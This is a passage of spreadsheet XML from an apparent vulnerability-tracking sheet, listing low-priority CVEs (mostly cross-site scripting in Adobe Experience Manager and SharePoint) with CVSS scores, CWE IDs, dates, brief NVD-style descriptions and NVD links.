r="O1344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1344" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1344" s="5" t="inlineStr" /><c r="R1344" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1344"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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64588</t></is></c></row><row r="1345"><c r="A1345" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1345" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1345" s="5" t="inlineStr"><is><t>CVE-2025-64589</t></is></c><c r="D1345" s="5" t="n"><v>5.4</v></c><c r="E1345" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1345" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1345" s="5" t="inlineStr" /><c r="H1345" s="5" t="n"><v>0.003</v></c><c r="I1345" s="5" t="inlineStr" /><c r="J1345" s="5" t="inlineStr" /><c r="K1345" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1345" s="5" t="inlineStr" /><c r="M1345" s="5" t="inlineStr" /><c r="N1345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1345" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1345" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1345" s="5" t="inlineStr" /><c r="R1345" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1345"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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64589</t></is></c></row><row r="1346"><c r="A1346" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1346" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1346" s="5" t="inlineStr"><is><t>CVE-2025-64610</t></is></c><c r="D1346" s="5" t="n"><v>5.4</v></c><c r="E1346" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1346" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1346" s="5" t="inlineStr" /><c r="H1346" s="5" t="n"><v>0.003</v></c><c r="I1346" s="5" t="inlineStr" /><c r="J1346" s="5" t="inlineStr" /><c r="K1346" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1346" s="5" t="inlineStr" /><c r="M1346" s="5" t="inlineStr" /><c r="N1346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1346" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1346" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1346" s="5" t="inlineStr" /><c r="R1346" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64610</t></is></c></row><row r="1347"><c r="A1347" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1347" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1347" s="5" t="inlineStr"><is><t>CVE-2025-64618</t></is></c><c r="D1347" s="5" t="n"><v>5.4</v></c><c r="E1347" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1347" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1347" s="5" t="inlineStr" /><c r="H1347" s="5" t="n"><v>0.003</v></c><c r="I1347" s="5" t="inlineStr" /><c r="J1347" s="5" t="inlineStr" /><c r="K1347" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1347" s="5" t="inlineStr" /><c r="M1347" s="5" t="inlineStr" /><c r="N1347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1347" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1347" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1347" s="5" t="inlineStr" /><c r="R1347" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64618</t></is></c></row><row r="1348"><c r="A1348" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1348" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1348" s="5" t="inlineStr"><is><t>CVE-2025-64830</t></is></c><c r="D1348" s="5" t="n"><v>5.4</v></c><c r="E1348" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1348" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1348" s="5" t="inlineStr" /><c r="H1348" s="5" t="n"><v>0.003</v></c><c r="I1348" s="5" t="inlineStr" /><c r="J1348" s="5" t="inlineStr" /><c r="K1348" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1348" s="5" t="inlineStr" /><c r="M1348" s="5" t="inlineStr" /><c r="N1348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1348" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1348" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1348" s="5" t="inlineStr" /><c r="R1348" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64830</t></is></c></row><row r="1349"><c r="A1349" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1349" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1349" s="5" t="inlineStr"><is><t>CVE-2025-64838</t></is></c><c r="D1349" s="5" t="n"><v>5.4</v></c><c r="E1349" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1349" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1349" s="5" t="inlineStr" /><c r="H1349" s="5" t="n"><v>0.003</v></c><c r="I1349" s="5" t="inlineStr" /><c r="J1349" s="5" t="inlineStr" /><c r="K1349" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1349" s="5" t="inlineStr" /><c r="M1349" s="5" t="inlineStr" /><c r="N1349" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1349" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1349" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1349" s="5" t="inlineStr" /><c r="R1349" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1349"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49" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64838</t></is></c></row><row r="1350"><c r="A1350" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1350" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1350" s="5" t="inlineStr"><is><t>CVE-2025-64854</t></is></c><c r="D1350" s="5" t="n"><v>5.4</v></c><c r="E1350" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1350" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1350" s="5" t="inlineStr" /><c r="H1350" s="5" t="n"><v>0.003</v></c><c r="I1350" s="5" t="inlineStr" /><c r="J1350" s="5" t="inlineStr" /><c r="K1350" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1350" s="5" t="inlineStr" /><c r="M1350" s="5" t="inlineStr" /><c r="N1350" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1350" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1350" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1350" s="5" t="inlineStr" /><c r="R1350" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1350"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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64854</t></is></c></row><row r="1351"><c r="A1351" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1351" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1351" s="5" t="inlineStr"><is><t>CVE-2025-64866</t></is></c><c r="D1351" s="5" t="n"><v>5.4</v></c><c r="E1351" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1351" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1351" s="5" t="inlineStr" /><c r="H1351" s="5" t="n"><v>0.003</v></c><c r="I1351" s="5" t="inlineStr" /><c r="J1351" s="5" t="inlineStr" /><c r="K1351" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1351" s="5" t="inlineStr" /><c r="M1351" s="5" t="inlineStr" /><c r="N1351" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1351" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1351" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1351" s="5" t="inlineStr" /><c r="R1351" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1351"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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64866</t></is></c></row><row r="1352"><c r="A1352" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1352" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1352" s="5" t="inlineStr"><is><t>CVE-2025-64868</t></is></c><c r="D1352" s="5" t="n"><v>5.4</v></c><c r="E1352" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1352" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1352" s="5" t="inlineStr" /><c r="H1352" s="5" t="n"><v>0.003</v></c><c r="I1352" s="5" t="inlineStr" /><c r="J1352" s="5" t="inlineStr" /><c r="K1352" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1352" s="5" t="inlineStr" /><c r="M1352" s="5" t="inlineStr" /><c r="N1352" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1352" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1352" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1352" s="5" t="inlineStr" /><c r="R1352" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1352"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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64868</t></is></c></row><row r="1353"><c r="A1353" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1353" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1353" s="5" t="inlineStr"><is><t>CVE-2026-19479</t></is></c><c r="D1353" s="5" t="n"><v>5.4</v></c><c r="E1353" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1353" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1353" s="5" t="inlineStr" /><c r="H1353" s="5" t="n"><v>0.003</v></c><c r="I1353" s="5" t="inlineStr" /><c r="J1353" s="5" t="inlineStr" /><c r="K1353" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1353" s="5" t="inlineStr" /><c r="M1353" s="5" t="inlineStr" /><c r="N1353" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1353" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1353" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1353" s="5" t="inlineStr" /><c r="R1353" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19479</t></is></c></row><row r="1354"><c r="A1354" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1354" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1354" s="5" t="inlineStr"><is><t>CVE-2026-19612</t></is></c><c r="D1354" s="5" t="n"><v>5.4</v></c><c r="E1354" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1354" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1354" s="5" t="inlineStr" /><c r="H1354" s="5" t="n"><v>0.003</v></c><c r="I1354" s="5" t="inlineStr" /><c r="J1354" s="5" t="inlineStr" /><c r="K1354" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1354" s="5" t="inlineStr" /><c r="M1354" s="5" t="inlineStr" /><c r="N1354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1354" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1354" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1354" s="5" t="inlineStr" /><c r="R1354" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19612</t></is></c></row><row r="1355"><c r="A1355" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1355" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1355" s="5" t="inlineStr"><is><t>CVE-2026-19644</t></is></c><c r="D1355" s="5" t="n"><v>5.4</v></c><c r="E1355" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1355" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1355" s="5" t="inlineStr" /><c r="H1355" s="5" t="n"><v>0.003</v></c><c r="I1355" s="5" t="inlineStr" /><c r="J1355" s="5" t="inlineStr" /><c r="K1355" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1355" s="5" t="inlineStr" /><c r="M1355" s="5" t="inlineStr" /><c r="N1355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1355" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1355" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1355" s="5" t="inlineStr" /><c r="R1355" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19644</t></is></c></row><row r="1356"><c r="A1356" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1356" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1356" s="5" t="inlineStr"><is><t>CVE-2026-19713</t></is></c><c r="D1356" s="5" t="n"><v>5.4</v></c><c r="E1356" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1356" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1356" s="5" t="inlineStr" /><c r="H1356" s="5" t="n"><v>0.003</v></c><c r="I1356" s="5" t="inlineStr" /><c r="J1356" s="5" t="inlineStr" /><c r="K1356" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1356" s="5" t="inlineStr" /><c r="M1356" s="5" t="inlineStr" /><c r="N1356" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1356" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1356" s="5" t="inlineStr" /><c r="R1356" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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56" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19713</t></is></c></row><row r="1357"><c r="A1357" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1357" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1357" s="5" t="inlineStr"><is><t>CVE-2026-2520</t></is></c><c r="D1357" s="5" t="n"><v>5.4</v></c><c r="E1357" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1357" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1357" s="5" t="inlineStr" /><c r="H1357" s="5" t="n"><v>0.002</v></c><c r="I1357" s="5" t="inlineStr" /><c r="J1357" s="5" t="inlineStr" /><c r="K1357" s="5" t="inlineStr" /><c r="L1357" s="5" t="inlineStr" /><c r="M1357" s="5" t="inlineStr" /><c r="N1357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1357" s="5" t="inlineStr" /><c r="R1357" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1357" s="5" t="inlineStr"><is><t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'updateAddon' function in all versions up to, and including, 27.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update any plugin with a main file of 'main.php' to its latest version.</t></is></c><c r="T1357" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-2520</t></is></c></row><row r="1358"><c r="A1358" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1358" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1358" s="5" t="inlineStr"><is><t>CVE-2026-27227</t></is></c><c r="D1358" s="5" t="n"><v>5.4</v></c><c r="E1358" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1358" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1358" s="5" t="inlineStr" /><c r="H1358" s="5" t="n"><v>0.003</v></c><c r="I1358" s="5" t="inlineStr" /><c r="J1358" s="5" t="inlineStr" /><c r="K1358" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1358" s="5" t="inlineStr" /><c r="M1358" s="5" t="inlineStr" /><c r="N1358" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1358" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1358" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1358" s="5" t="inlineStr" /><c r="R1358" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S135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58" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-27227</t></is></c></row><row r="1359"><c r="A1359" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1359" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1359" s="5" t="inlineStr"><is><t>CVE-2026-52307</t></is></c><c r="D1359" s="5" t="n"><v>5.4</v></c><c r="E1359" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1359" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1359" s="5" t="inlineStr" /><c r="H1359" s="5" t="n"><v>0.003</v></c><c r="I1359" s="5" t="inlineStr" /><c r="J1359" s="5" t="inlineStr" /><c r="K1359" s="5" t="inlineStr" /><c r="L1359" s="5" t="inlineStr" /><c r="M1359" s="5" t="inlineStr" /><c r="N1359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1359" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1359" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1359" s="5" t="inlineStr" /><c r="R1359" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1359" s="5" t="inlineStr"><is><t>An authenticated stored cross-site scripting (XSS) vulnerability in the Column Management component of ClassCMS 1CMS v5.6 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the title field.</t></is></c><c r="T1359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52307</t></is></c></row><row r="1360"><c r="A1360" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1360" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1360" s="5" t="inlineStr"><is><t>CVE-2026-69402</t></is></c><c r="D1360" s="5" t="n"><v>5.4</v></c><c r="E1360" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1360" s="5" t="inlineStr" /><c r="H1360" s="5" t="n"><v>0.004</v></c><c r="I1360" s="5" t="inlineStr" /><c r="J1360" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1360" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1360" s="5" t="inlineStr" /><c r="M1360" s="5" t="inlineStr" /><c r="N1360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1360" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1360" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1360" s="5" t="inlineStr" /><c r="R1360" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1360" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1360" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69402</t></is></c></row><row r="1361"><c r="A1361" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1361" s="5" t="inlineStr"><is><t>CVE-2026-69417</t></is></c><c r="D1361" s="5" t="n"><v>5.4</v></c><c r="E1361" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1361" s="5" t="inlineStr" /><c r="H1361" s="5" t="n"><v>0.004</v></c><c r="I1361" s="5" t="inlineStr" /><c r="J1361" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1361" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1361" s="5" t="inlineStr" /><c r="M1361" s="5" t="inlineStr" /><c r="N1361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1361" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1361" s="5" t="inlineStr" /><c r="R1361" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1361" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69417</t></is></c></row><row r="1362"><c r="A1362" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1362" s="5" t="inlineStr"><is><t>CVE-2026-69690</t></is></c><c r="D1362" s="5" t="n"><v>5.4</v></c><c r="E1362" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1362" s="5" t="inlineStr" /><c r="H1362" s="5" t="n"><v>0.004</v></c><c r="I1362" s="5" t="inlineStr" /><c r="J1362" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1362" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1362" s="5" t="inlineStr" /><c r="M1362" s="5" t="inlineStr" /><c r="N1362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1362" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1362" s="5" t="inlineStr" /><c r="R1362" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1362" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1362" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69690</t></is></c></row><row r="1363"><c r="A1363" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1363" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1363" s="5" t="inlineStr"><is><t>CVE-2026-71356</t></is></c><c r="D1363" s="5" t="n"><v>5.4</v></c><c r="E1363" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1363" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1363" s="5" t="inlineStr" /><c r="H1363" s="5" t="n"><v>0.003</v></c><c r="I1363" s="5" t="inlineStr" /><c r="J1363" s="5" t="inlineStr" /><c r="K1363" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1363" s="5" t="inlineStr" /><c r="M1363" s="5" t="inlineStr" /><c r="N1363" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1363" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1363" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1363" s="5" t="inlineStr" /><c r="R1363" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71356</t></is></c></row><row r="1364"><c r="A1364" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1364" s="5" t="inlineStr"><is><t>CVE-2026-71357</t></is></c><c r="D1364" s="5" t="n"><v>5.4</v></c><c r="E1364" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1364" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1364" s="5" t="inlineStr" /><c r="H1364" s="5" t="n"><v>0.003</v></c><c r="I1364" s="5" t="inlineStr" /><c r="J1364" s="5" t="inlineStr" /><c r="K1364" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1364" s="5" t="inlineStr" /><c r="M1364" s="5" t="inlineStr" /><c r="N1364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1364" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1364" s="5" t="inlineStr" /><c r="R1364" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71357</t></is></c></row><row r="1365"><c r="A1365" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1365" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1365" s="5" t="inlineStr"><is><t>CVE-2026-71388</t></is></c><c r="D1365" s="5" t="n"><v>5.4</v></c><c r="E1365" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1365" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1365" s="5" t="inlineStr" /><c r="H1365" s="5" t="n"><v>0.003</v></c><c r="I1365" s="5" t="inlineStr" /><c r="J1365" s="5" t="inlineStr" /><c r="K1365" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1365" s="5" t="inlineStr" /><c r="M1365" s="5" t="inlineStr" /><c r="N1365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1365" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1365" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1365" s="5" t="inlineStr" /><c r="R1365" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71388</t></is></c></row><row r="1366"><c r="A1366" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1366" s="5" t="inlineStr"><is><t>CVE-2026-71440</t></is></c><c r="D1366" s="5" t="n"><v>5.4</v></c><c r="E1366" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1366" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1366" s="5" t="inlineStr" /><c r="H1366" s="5" t="n"><v>0.002</v></c><c r="I1366" s="5" t="inlineStr" /><c r="J1366" s="5" t="inlineStr" /><c r="K1366" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1366" s="5" t="inlineStr" /><c r="M1366" s="5" t="inlineStr" /><c r="N1366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1366" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1366" s="5" t="inlineStr" /><c r="R1366" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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66" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71440</t></is></c></row><row r="1367"><c r="A1367" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1367" s="5" t="inlineStr"><is><t>CVE-2026-71565</t></is></c><c r="D1367" s="5" t="n"><v>5.4</v></c><c r="E1367" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1367" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1367" s="5" t="inlineStr" /><c r="H1367" s="5" t="n"><v>0.002</v></c><c r="I1367" s="5" t="inlineStr" /><c r="J1367" s="5" t="inlineStr" /><c r="K1367" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1367" s="5" t="inlineStr" /><c r="M1367" s="5" t="inlineStr" /><c r="N1367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1367" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1367" s="5" t="inlineStr" 